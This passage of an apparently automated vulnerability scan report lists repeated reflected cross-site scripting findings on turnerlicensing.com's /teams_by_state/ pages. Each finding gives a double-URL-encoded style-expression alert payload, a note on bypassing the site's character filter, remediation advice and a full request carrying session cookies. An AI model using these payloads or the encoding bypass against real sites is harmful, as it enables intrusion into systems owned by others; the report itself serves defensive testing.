GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.79. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Alaska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.80. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Arizona
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.81. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Arkansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.82. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Calgary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.83. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/California
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.84. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Colorado
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.85. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Connecticut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.86. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Delaware
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.87. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Edmonton
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.88. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Florida
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.89. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Georgia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.90. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Hawaii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.91. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Idaho
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.92. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Illinois
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.93. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Indiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
